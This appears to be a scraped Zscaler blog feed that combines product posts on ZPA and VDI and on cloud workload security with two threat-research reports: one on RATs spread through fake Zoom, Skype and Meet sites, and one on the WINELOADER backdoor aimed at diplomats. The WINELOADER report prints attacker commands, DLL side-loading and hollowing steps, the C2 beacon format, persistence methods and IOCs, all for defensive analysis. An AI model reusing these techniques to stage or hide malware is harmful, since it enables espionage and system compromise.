on-premises/on-network mindset. In some cases, Zscaler can be integrated in the existing environment to simply provide the appropriate level of security. There are two main aspects to consider: Most applications are now web-based and could be securely made available to users regardless of VDI. Even if VDI is not replaced for all users, there are multiple reasons to integrate with ZIA/ ZPA. Just think about users like financial advisors and insurance agents. Many firms have moved to web-based apps, DocuSign, etc. There may no longer be a hard requirement for those thousands of users to have VDI. This requires going beyond what the network team may see, and engaging architects, app owners, etc. If we focus on the second aspect; rather than replacing the VDI infrastructure, another approach is to complement it. If we think about those use cases, organisations could still have security concerns around the user’s connectivity to the VDI environment (e.g. VMware Knowledge Base). In these scenarios, ZPA could protect that user traffic: it can secure access “to” the VDI environment and access “from” the VDI environment like shown in the below diagram. The protection of traffic aimed to Internet/SaaS is addressed by ZIA services. Connectivity to the VDI environment: Organisations may either put the VDI on the edge with its own DMZ infrastructure, firewall, security gateway, load balancer, etc. and have users connect directly or leverage a VPN-like technology to put the user on the network to access the VDI. ZPA, with Client Connector, enables a customer to either replace their internet-facing components or replace their VPN that is putting users onto the network. Connectivity from the VDI environment: Organisations want to further segment what users have access to from their trusted device. ZPA with Client Connector can assist with setting up granular access on an application level. Complete alternative to VDI: Organisations can leverage alternatives to VDI such as Zscaler Browser Isolation to replace their traditional VDI architecture. The benefits remain the same if a user has a browser managed by the enterprise which is isolated from the endpoint, the organisations admin remains in control of what can be egressed. Benefits of such an approach is the significantly lowered overhead to manage such a capability. The Zscaler Client Connector can be installed on the user’s device along with the VDI client, and ZPA carries the VDI traffic as a private application. Another option is installing ZCC on the virtual desktop instance (Citrix XenDesktop, Azure WVD, Amazon WorkSpaces) to control what the user has access to internally. Existing customers are deploying this model with WVD and Amazon Workspaces using ZCC for both ZIA and ZPA. Benefits in such a scenario are centralized visibility and control, single access control policy config for VDI, and other forms of access, creating a consistent user experience. Finally, a hybrid approach is feasible. In this case, organisations want to offer direct ZPA access to employees, but VDI-only access to third parties, and want to extend ZPA’s centralized visibility and control for VDI users accessing private applications. All these examples show that there are multiple ways to either completely exchange or complement the existing VDI installation. Fri, 08 Mar 2024 00:59:22 -0800 Stefano Alei https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-2 https://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures IntroductionBeginning in December 2023, Zscaler’s ThreatLabz discovered a threat actor creating fraudulent Skype, Google Meet, and Zoom websites to spread malware. The threat actor spreads SpyNote RAT to Android users and NjRAT and DCRat to Windows users. This article describes and shows how the threat actor’s malicious URLs and files can be identified on these fraudulent online meeting websites. Key Takeaways A threat actor is distributing multiple malware families using fake Skype, Zoom, and Google Meet websites. The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems. Campaign OverviewThe attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian as shown in all the figures below. In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites. Attack SequenceThe diagram below illustrates how the malware was distributed and executed on the victim's machine during the campaign: Figure 1: Attack chain and execution flow for Android and Windows campaigns. When a user visits one of the fake sites, clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file. The BAT file when executed performs additional actions, ultimately leading to the download of a RAT payload. SkypeDuring our investigation, we discovered that the first fake site, join-skype[.]info, was created in early December to deceive users into downloading a fake Skype application as shown in Figure 2. Figure 2: The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Image courtesy of urlscan.io.) The Windows button pointed to a file named Skype8.exe and the Google Play button pointed at Skype.apk (neither of these files was available at the time of analysis). The Apple App Store button redirected to https://go.skype.com/skype.download.for.phone.iphone, indicating that the threat actor was not targeting iOS users with malware. Google MeetIn late December, the attacker created another fake site, online-cloudmeeting[.]pro, mimicking Google Meet as shown in Figure 3. The fake Google Meet site was hosted on online-cloudmeeting[.]pro/gry-ucdu-fhc/ where the subpath gry-ucdu-fhc was deliberately created to resemble a Google Meet joining link. Genuine Google Meet invite codes typically follow the structure [a-z]{3}-[a-z]{4}-[a-z]{3}. The fake site provides links to download a fake Skype application for Android and/or Windows. The Windows link leads to a BAT file named updateZoom20243001bit.bat, which in turn downloads the final payload named ZoomDirectUpdate.exe. This final payload is a WinRAR archive file that contains DCRat, packed with Eziriz .NET Reactor. Figure 3: The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware. The Android link in this figure led to a SpyNote RAT APK file named meet.apk. ZoomIn late January, we observed the emergence of a fake Zoom site (shown in Figure 4), us06webzoomus[.]pro. The fake Zoom site, hosted at the URL us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/, features a subpath that closely resembles a meeting ID generated by the Zoom client. If a user clicks the Google Play link, a file named Zoom02.apk will be downloaded containing the SpyNote RAT. Similar to the fake Google Meet site, when a user clicks the Windows button it downloads a BAT file, which in turn downloads a DCRat payload. Figure 4: The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked. Open DirectoriesIn addition to hosting DCRat, the fake Google Meet and Zoom websites also contain an open directory (shown in Figure 5) with two additional Windows executable files named driver.exe and meet.exe (inside the archive gry-ucdu-fhc.zip), which are NjRAT. The presence of these files suggests that the attacker may utilize them in other campaigns, given their distinct names. Figure 5: Example of additional malicious files hosted on the websites hosting fake online meeting applications. ConclusionOur research demonstrates that businesses may be subject to threats that impersonate online meeting applications. In this example, a threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files. Our findings highlight the need for robust security measures to protect against advanced and evolving malware threats and the importance of regular updates and security patches. As cyber threats continue to evolve and become increasingly complex, it is critical to remain alert and take proactive measures to protect against them. Zscaler's ThreatLabz team is dedicated to staying on top of these threats and sharing our findings with the wider community. Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler sandbox played a vital role in analyzing the behavior of different files. The sandbox analysis allowed us to identify threat scores and pinpoint specific MITRE ATT&CK techniques that were triggered during the analysis process. Figure 6: DCRat Zscaler sandbox report Figure 7: NjRAT Zscaler sandbox report Zscaler’s multilayered cloud security platform detected payloads with the following threat names: Win32.Backdoor.DCRat Win32.Backdoor.NjRat MITRE ATT&CK TechniquesEnterprise MatrixTACTIC TECHNIQUE ID TECHNIQUE NAME Execution T1064 T1059.001 Scripting PowerShell Persistence T1547.001 Registry Run Keys / Startup Folder Privilege Escalation T1547 Boot or Logon Autostart Execution Defense Evasion T1140 T1064 T1027 T1027.002 T1070.004 T1036 Deobfuscate/Decode Files or Information Scripting Obfuscated Files or Information Software Packing File Deletion Masquerading Credential Access T1056 T1555 Input Capture Credentials from Password Stores Discovery T1124 T1083 T1082 T1518.001 T1057 T1010 T1018 T1016 T1120 System Time Discovery File and Directory Discovery System Information Discovery Security Software Discovery Process Discovery Application Window Discovery Remote System Discovery System Network Configuration Discovery Peripheral Device Discovery Collection T1123 T1115 T1056 T1113 T1125 Audio Capture Clipboard Data Input Capture Screen Capture Video Capture Command and Control T1219 T1573 T1571 T1095 T1071 Remote Access Software Encrypted Channel Non-Standard Port Non-Application Layer Protocol Application Layer Protocol Impact T1498 T1529 Network Denial of Service System Shutdown/Reboot Mobile MatrixTACTIC TECHNIQUE ID TECHNIQUE NAME Persistence T1624 T1444 Event Triggered Execution: Broadcast Receivers Masquerade as Legitimate Application Privilege Escalation, Persistence T1626 T1546 Abuse Elevation Control Mechanism Event Triggered Execution Collection T1533 T1429 T1430 T1636 Data from Local System Audio Capture Location Tracking Contact and SMS data Tue, 05 Mar 2024 08:30:01 -0800 Himanshu Sharma https://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-1 What are some of the most common concerns heard from customers about virtual desktop infrastructure (VDI)? They are often related to cost, complexity, management, upkeep, and security. How can Zscaler solve these challenges? VDI is an undoubtedly complex environment, and having a clear picture of the organization’s needs, and positioning the right solution to improve security, reduce complexity, and improve the user experience is not always easy. Zscaler Private Access (ZPA) has evolved in the past few years and become a direct replacement of VDI, whether on-premises or cloud-delivered. It is, however, not yet possible to map all the use cases supported by a VDI implementation and, in general, is not a trivial task. Sometimes Zscaler can play a role by simply integrating solutions and providing the right level of security. To be able to understand which role ZPA can play to replace VDI, it is crucial to first understand why the customer is using a VDI. Organisations leverage VDI for various reasons. The most common use cases are: 1. Access granularity – restrict users’ access to only authorized applications 2. Traffic inspection – VDI as a choke point to run all traffic through on-premises security stacks 3. Data residency restriction a) Ensure data stays within corporate boundary and/or b) Ensure data is never stored on an end user's device 4. Traffic localization – minimize latency for heavyweight client-server interactions (e.g. database calls) 5. Desktop or software license management / reduction a) Clean desktop experience b) Persistent desktop that the user can access from multiple devices c) Software deployed to a limited pool of virtual desktops, rather than to all user devices 6. Legacy app support – enable access to apps that require an older OS VDIs are expensive, cumbersome to manage, and often hinder user experience. But there is much more to think about: we are witnessing profound changes in the EUC (End User Computing) market. Considering most applications are now web-based, you could potentially replace a VDI with an isolated browser access and provide secure access to these web applications. Applications requiring access via protocols, such as SSH and RDP, can be easily addressed using the Zscaler Privileged Remote Access (PRA). However, organisations probably still need to depend on VDIs in certain scenarios, like if they have applications requiring thick clients. In this case, they would be able to significantly reduce the size of their VDI deployment by using browser isolation. Whenever Zscaler can’t replace VDI, it can still be integrated. Zscaler can secure Internet/SaaS access of VDI instances, and additionally can protect access to VDI infrastructure. Whenever there is a VDI environment, ZIA and ZPA capabilities can play a role and improve an environment. Major use cases in detail 1. Access granularity This use case is fully supported and can be deployed by leveraging multiple capabilities of the Zscaler Zero Trust Exchange platform, like Browser Isolation. It allows you to leverage a web browser for user authentication and application access over ZPA, without requiring users to install Zscaler Client Connector on their devices. In certain cases, it might not be feasible or desirable to install Client Connector on all devices. For example, you might want to provide third-party access to applications on devices that might not be owned or managed by your company (e.g., contractor or partner-owned devices) or control user access to applications on devices with operating systems that are not currently supported by Zscaler Client Connector. Browser Isolation (BI) enhances the ZPA experience by making applications accessible for users from any web browser without requiring Zscaler Client Connector or browser plugins and configurations. Additionally, the existing Identity Provider (IdP) can be used to provide access to current users, contractors, and other third-party users without managing an internet footprint. BI is a feature that addresses needs in both cyberthreat protection and data loss prevention and can be leveraged for both internet/SaaS apps and private apps. BI policies can dictate if a site should be run within isolation, and if so, whether you allow cut/paste and download capabilities for the user. An isolation container is instantiated for each user in the cloud and only pixels are transmitted to the user’s browser. Sites may be isolated due to a configured URL category, cloud app control policy, or suspicious destinations (if Smart Browser Isolation is enabled). Last, but not least, is worthwhile to mention the recent capabilities introduced by the User Portal 2.0, that allows unmanaged devices to SaaS & private web apps. With this feature enabled, unmanaged devices will be able to use ZPA user portal to access both sanctioned SaaS/private web apps AND have their internet facing traffic routed through ZIA while in Isolation mode. Organisations can provide access to sanctioned SaaS applications from unmanaged devices to enforce policies using the isolation policies defined on ZPA. The isolation containers that are created as a result of a ZPA Isolation Policy can forward non-ZPA defined application traffic and internet traffic generated to ZIA for further processing and enforcement of necessary policies. Any traffic generated for applications defined on ZPA will continue to be forwarded via ZPA’s ZTNA service. 2. Traffic inspection Although this use case is rare, traffic inspection is still fully supported, leveraging the inspection capability provided by the Zero Trust Exchange platform. We can use Zscaler Private Access (ZPA) AppProtection (formerly Inspection), that provides high-performance, inline security inspection of the entire application payload to expose threats. It identifies and blocks known web security risks, such as the OWASP Top 10, and emerging zero-day vulnerabilities that can bypass traditional network security controls. It can help to protect internal applications from all types of attacks in the OWASP predefined controls with SQL injection, cross-site scripting (XSS), and more. Additionally, it helps to understand the severity, description, and recommended default action for each type of attack related to OWASP predefined controls. Each OWASP predefined control is identified with a unique number, defining how the control operates, and is associated with the level of concern. The predefined controls are organized into various categories: - Preprocessors - Environment and Port Scanners - Protocol Issues - Request Smuggling or Response Split or Header Injection - Local File Inclusion - Remote File Inclusion - Remote Code Execution - PHP Injection - Cross-Site Scripting (XSS) - SQL Injection - Session Fixation - Deserialization - Issues Anomalies Additionally, Zscaler recently introduced support for inspecting ZPA application segment traffic. A predefined forwarding rule, ZIA Inspected ZPA Apps, is available on the Policy > Forwarding Control page to inspect the Microtunnel traffic of a ZPA application segment using ZIA. This rule is applied automatically to the traffic from ZPA application segments with the Inspect Traffic with ZIA field enabled in the ZPA Admin Portal. As part of this feature, a predefined Auto ZPA Gateway is available on the Administration > Zscaler Private Access Gateway page. This new gateway is the default for the predefined ZIA Inspected ZPA Apps forwarding rule. We can minimize data exfiltration concerns with ZPA AppProtection, by utilizing Cloud Browser Isolation (CBI) where unmanaged devices are prevented from downloading sensitive content to the local host. For corporately managed devices, organisations can leverage DLP with Source IP Anchoring (SIPA) utilizing the ZIA cloud. AppProtection customers can craft custom signatures to detect and block bulk data downloads and use those in conjunction with other validation methods such as ZPA posture control. Organisations can rely on Zscaler Internet Access (ZIA) SSL Inspection best practices for configuring and deploying in an organization's network environment, for example, while accessing SaaS applications. Encrypting communications helps maintain the privacy and security of information passed between sender and receiver communications. Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS), are protocols designed for the privacy and security of internet services. While these protocols do a great job of keeping information private from prying eyes, these security tools also conceal threats to the user, device, and organization. This is where the inspection of SSL and TLS encrypted traffic becomes a necessity. Inspecting encrypted SSL and TLS traffic via SSL Inspection is done by the Zero Trust Exchange at scale, allowing organizations to control risk and enforce policy. Enabling SSL Inspection is a required first step towards: - Controlling risk - Inspecting traffic (malware, data loss) - Adaptive control - Enforcing policy - Per-session policy decision and enforcement - Allowing, blocking, and restricting tenants environment. Use cases 3 to 6 will be covered in part two of this series. Fri, 01 Mar 2024 02:41:49 -0800 Stefano Alei https://www.zscaler.com/blogs/product-insights/positioning-zscaler-private-access-relative-to-vdi-part-1 https://www.zscaler.com/blogs/product-insights/securing-government-workload-communications-public-cloud As government agencies continue their journey towards digital transformation, many are embracing hybrid cloud deployments to modernize their operations. A transition to a public or private cloud brings new challenges, especially when it comes to securing workload communications. In this blog, we will delve into the reality of hybrid cloud deployments and explore how Zscaler's zero trust architecture provides a comprehensive solution for securing government workloads in the public cloud. The Expanding Definition of Hybrid Cloud Hybrid cloud deployments have become increasingly complex as agencies expand their infrastructure across multiple regions and clouds. Rather than relying on a single cloud or region, agencies leverage different regional clouds to ensure availability and scalability. Additionally, within a specific region, agencies may need to consider availability zones to ensure business continuity. Figure 1 illustrates scenarios of hybrid cloud deployments. Workload Communications in the Public Cloud To illustrate the challenges of workload communications, let's consider the example of a Department of Motor Vehicles (DMV) application deployed in the AWS GovCloud. This application needs to interact with other workloads or applications, such as a CRM or ERP system in the data center, to access driver records. It may also need to communicate with scheduling applications in different regions or clouds, and even access vehicle registration information stored in a different cloud provider such as Azure. Additionally, the DMV application may require software updates and send logs to the Google Cloud Platform. Figure 2 shows Legacy Architecture Challenges Traditionally, agencies have extended their on-premises architecture to the cloud by deploying firewalls and VPNs. While this approach may provide initial security, it also amplifies lateral movement, increases cyberthreats, and exposes the infrastructure to data leaks. Moreover, deploying and managing multiple firewalls and VPNs across different cloud environments and regions adds complexity and operational costs. Introducing Zscaler's Zero Trust Approach Zscaler offers a cloud-delivered security platform based on zero trust principles to address the challenges faced by government agencies in securing workload communications. By adopting a zero trust proxy-based architecture, Zscaler eliminates the expanded attack surface and lateral movement risks associated with legacy architectures. Connectivity and Security Zscaler's platform provides both connectivity and security for workloads in the public cloud. It ensures secure connectivity by allowing access only to specific URLs or APIs, preventing open access to the internet. Workload-to-workload communications are based on least privileged access, ensuring that each workload can only communicate with authorized resources. Before any connection is established, zero trust-based authentication and authorization checks are performed, further enhancing security. Threat Prevention and Data Protection Zscaler's platform offers comprehensive threat prevention and data protection capabilities. It provides URL filtering, intrusion prevention, DNS protection, and behavior analysis, all backed by AI and ML-based risk analysis. Inline data protection ensures that sensitive data does not leak from workloads, with features such as regex-based checks, exact data management matching, OCR technology for file inspection, and AI/ML-based data classification. TLS Decryption at Cloud Scale With the increasing prevalence of encrypted traffic, TLS decryption at cloud scale becomes crucial. Zscaler's platform provides 100% inspection of traffic without compromising performance. This allows for effective threat prevention and data protection, ensuring the safety of data packets and preventing malicious intent. Granular App-to-App Segmentation Zscaler enables granular app-to-app segmentation, eliminating the need for expensive networking infrastructure or additional layers of segmentation software. This ensures that workloads can only access authorized resources, providing an additional layer of security. The Common Platform Advantage Zscaler's platform offers a common platform for securing workloads across multiple clouds. By installing lightweight cloud connectors in different clouds, agencies can benefit from standardized and consolidated security operations. This approach simplifies security management, reduces operational complexity and costs, and ensures consistent security policies across multiple clouds. It stops external threats, by protecting egress traffic from any malicious payload. It protects against insider threats by eliminating the threat of a bad actor within the agency who's got the credential to inflict harm, either by inserting a payload, a malicious payload, or trying to exfiltrate data sensitive data. The Zero Trust Exchange is designed to eliminate lateral movement and reduce the attack surface significantly. Moreover, Zscaler's platform is both FedRAMP and StateRAMP Authorized and GovCloud ready. For more information on Zscaler Workload Communications: Download the Datasheet Watch the Webinar: Ensuring Cloud Workload Security for Federal and State Government Request a Test Drive in AWS Wed, 28 Feb 2024 05:05:01 -0800 Sakthi Chandra https://www.zscaler.com/blogs/product-insights/securing-government-workload-communications-public-cloud https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader IntroductionZscaler's ThreatLabz discovered a suspicious PDF file uploaded to VirusTotal from Latvia on January 30th, 2024. This PDF file is masqueraded as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024. The PDF also included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site, initiating the infection chain. Further threat hunting led us to the discovery of another similar PDF file uploaded to VirusTotal from Latvia in July 2023.This blog provides detailed information about a previously undocumented backdoor we named ‘WINELOADER'. We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack. The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command and control (C2) infrastructure. While we have not yet attributed this attack to any known APT group, we have named this threat actor SPIKEDWINE based on the wine-related theme and filenames used in different stages of the attack chain, and our investigation into the case is ongoing.Key Takeaways Low-volume targeted attack: The samples intentionally targeted officials from countries with Indian diplomatic missions, although VirusTotal submissions indicate a specific focus on European diplomats. New modular backdoor: WINELOADER has a modular design, with encrypted modules downloaded from the command and control (C2) server. Evasive tactics: The backdoor employs techniques, including re-encryption and zeroing out memory buffers, to guard sensitive data in memory and evade memory forensics solutions. Compromised infrastructure: The threat actor utilized compromised websites at multiple stages of the attack chain. Attack Chain Figure 1 below illustrates the multi-stage attack chain at a high level. Figure 1: Multi-stage attack chain of WINELOADER. Technical AnalysisIn this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.PDF analysisThe PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India. The invitation contains a link to a fake questionnaire, which kickstarts the infection chain.The malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file - wine.hta.Figure 2 below shows the contents of the PDF file.Figure 2: The PDF invitation showcasing the malicious link.A quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the time of creation was January 29th, 2024, at 10:38 AM UTC.HTA file analysisThe HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of the publicly available obfuscator obfuscator.io.Figure 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.Figure 3: Obfuscated JavaScript code inside the HTA file.The HTA file performs the following key functions:Downloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.phpSaves the text file to the path: C:\Windows\Tasks\text.txtUses certutil.exe to Base64 decode the text file and write the result to a ZIP archive with the path: C:\Windows\Tasks\text.zip. The command used is: certutil -decode C:\Windows\Tasks\text.txt C:\Windows\\Tasks\text.zipExtracts the contents of the ZIP archive to the path: C:\Windows\Tasks\. The command used is: tar -xf C:\Windows\Tasks\text.zip -C C:\Windows\Tasks\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and vcruntime140.dll is the malicious DLL crafted by the attacker which will be side-loaded automatically when sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in-the-wild by any threat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.Executes sqlwriter.exe from the path: C:\Windows\Tasks\ which will kick start the infection chain.WINELOADER binary analysisWhen executing sqlwriter.exe, it loads a malicious DLL named vcruntime140.dll from the same directory using DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.Figure 4: Code section that decrypts and executes the WINELOADER core module.Each module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.Figure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.WINELOADER employs the following techniques to evade detection:Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:The core module and subsequent modules downloaded from the C2 server Strings (e.g. DLL filenames and API import function names)Data sent and received from the C2 serverSome strings are decrypted on use and re-encrypted shortly after.Memory buffers for storing results from API calls or decrypted strings are zeroed after use.DLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory. The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).Figure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.WINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:advapi32.dllapi-ms-win-crt-math-l1-1-0.dllapi-ms-win-crt-stdio-l1-1-0.dllbcryptprimitives.dlliphlpapi.dllkernel32.dllkernelbase.dllmscoree.dllntdll.dllole32.dllrpcrt4.dllshlwapi.dlluser32.dllwininet.dllWINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the first beacon request to the C2 server.The beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself.The body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected. This information in available in the table below.OffsetLengthNameDescription0x02Length of padding bytes (n)This value is randomized (min: 255, max: 65535), stored in little-endian (LE).0x2nPadding bytesPadding bytes are randomly generated with the ProcessPrng API.0x2 + n8Campaign ID?5F D5 97 93 ED 26 CB 5A in the analyzed sample.0xa + n8Session ID?Randomly generated on execution.0x12 + n 8Local IP addressThe local IP address of the infected machine.0x20 + n512Parent process nameIn Unicode0x220 + n512User nameIn Unicode0x420 + n30Machine nameIn Unicode0x43e + n4Parent process IDIn little-endian0x442 + n1Parent process token elevation typeInformation about the privileges of the token linked to the parent process.0x443 + n8Polling interval for C2 requestsC0 d4 01 00 00 00 00 00 in the analyzed sample, translates to 120,000 ms or 2 mins between requests.0x44b + n1Request type?1 for beacon, 2 for status update0x44c + n8Length of messageIn little-endian. 0 for beacon requests0x454 + n8Unknown?Observed to match the value of the request type field.0x45c + n8Module ID?00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.0x464 + nVariesMessageOnly observed for type 2 requests.Table 1: WINELOADER C2 beacon request fieldsAn example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.GET /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1 Host: castechtools.com Content-Length: 54674 54,674 bytes of binary data in the request body (not shown here)The same RC4 key is then used to decrypt the response from the C2 server. The fields for the decrypted response are shown in the table below.OffsetLengthNameDescription0x02Length of padding bytes (n)This value is stored in little-endian (LE).0x2nPadding bytesUnused bytes0x2 + n8Campaign ID?5F D5 97 93 ED 26 CB 5A in the analyzed sample0xa + n1CommandCommand from C20xb + n VariesCommand dataBinary data for commandTable 2: WINELOADER C2 response fieldsThe core module supports three commands:Execute modules from the C2 either synchronously or asynchronously (via CreateThread)Inject itself into another DLLUpdate the sleep interval between beacon requestsDuring our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\Windows\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\Windows\Tasks\sqlwriter.exe daily.The persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.After establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.Command And Control Infrastructure The threat actor leveraged compromised network infrastructure at all stages of the attack chain. We identified three compromised websites used for hosting intermediate payloads or as C2 servers. Based on our in-depth analysis of the C2 communication, we believe the C2 server only responds to specific types of requests at certain times. This measure prevents automated analysis solutions from retrieving C2 responses and modular payloads. Conclusion The threat discussed in this blog demonstrated advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in exploiting the diplomatic relations between India and Europe. The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions. While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats. Zscaler Coverage Figure 7: Zscaler sandbox detection report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to WINELOADER at various levels with the following threat names: Win64.Downloader.WineLoader Indicators Of Compromise (IOCs) SHA256 Description 72b92683052e0c813890caf7b4f8bfd331a8b2afc324dd545d46138f677178c4 vcruntime140.dll (WINELOADER core module loader) ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7 wine.pdf (July 2023 invitation) 3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9 wine.pdf (Feb 2024 invitation) 1c7593078f69f642b3442dc558cddff4347334ed7c96cd096367afd08dca67bc wine.hta e477f52a5f67830d81cf417434991fe088bfec21984514a5ee22c1bcffe1f2bc WINELOADER core module f61cee951b7024fca048175ca0606bfd550437f5ba2824c50d10bef8fb54ca45 WINELOADER core module (RC4-encrypted) c1223aa67a72e6c4a9a61bf3733b68bfbe08add41b73ad133a7c640ba265a19e WINELOADER persistence module loader b014cdff3ac877bdd329ca0c02bdd604817e7af36ad82f912132c50355af0920 WINELOADER persistence module 7600d4bb4e159b38408cb4f3a4fa19a5526eec0051c8c508ef1045f75b0f6083 WINELOADER persistence module (RC4-encrypted) URL Description hxxps://castechtools[.]com/api.php WINELOADER C2 hxxps://seeceafcleaners[.]co[.]uk/cert.php Downloads base64-encoded ZIP archive from this URL. hxxps://seeceafcleaners[.]co[.]uk/wine.php Downloads the ZIP archive containing the wine.hta file. hxxps://passatempobasico[.]com[.]br/wine.php Downloads the ZIP archive containing the wine.hta file (IOC from July 2023). MITRE ATT&CK Framework ID Tactic Description T1204.002 User Execution: Malicious File The PDF file that masquerades as an invitation contains a malicious link. T1656 Impersonation The contents of the PDF are crafted to impersonate the Ambassador of India. T1204.001 User Execution: Malicious Link The PDF file contains a link that leads to the download of a malicious ZIP archive. T1574.002 Hijack Execution Flow: DLL Side-Loading sqlwriter.exe is used to DLL side-load vcruntime140.dll. T1055.001 Process Injection: Dynamic-link Library Injection DLL hollowing is used to load a randomly chosen system DLL into sqlwriter.exe process memory and inject WINELOADER in that DLL. T1573.001 Encrypted Channel: Symmetric Cryptography RC4 stream cipher is used to encrypt the data exchanged between WINELOADER and the C2 server. T1041 Exfiltration Over C2 Channel Data is encrypted and exfiltrated to the C2 server. T1584 Compromise Infrastructure Compromised sites are used for hosting payloads and as a C2 server. T1053.005 Scheduled Task/Job: Scheduled Task A scheduled task with the name “MS SQL Writer” is created to ensure sqlwriter.exe is executed to kick-start the infection chain. T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder WINELOADER can be configured to execute on Windows startup by setting the registry key at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer. T1140 Deobfuscate/Decode Files or Information WINELOADER strings and modules are encrypted with RC4. Sensitive data is often re-encrypted or zeroed out after use. T1036.001 Masquerading: Invalid Code Signature vcruntime140.dll has an invalid Microsoft code signing certificate. T1036.004 Masquerading: Masquerade Task or Service The scheduled task created for persistence masquerades as a legitimate Microsoft scheduled task. T1027.007 Obfuscated Files or Information: Dynamic API Resolution API names are decrypted before they are dynamically resolved and called. T1027.009 Obfuscated Files or Information: Embedded Payloads WINELOADER modules are encrypted with RC4 within vcruntime140.dll and C2 responses. T1218.005 System Binary Proxy Execution: Mshta mshta.exe executes wine.hta, which contains malicious JS downloader code. T1033 System Owner/User Discovery WINELOADER sends the current user and system name in each C2 request. T1071.001 Application Layer Protocol: Web Protocols WINELOADER communicates with its C2 via HTTPS. HTTP GET requests contain a request body that is atypical of such requests. T1001.001 Data Obfuscation: Junk Data WINELOADER prepends a randomized number of junk bytes to the request data before encrypting and sending it to the C2. Appendix Below is the full 256-byte RC4 key embedded inside WINELOADER that is used to encrypt and decrypt the information exchanged between the malware and the C2 server. Tue, 27 Feb 2024 09:32:38 -0800 Sudeep Singh https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader 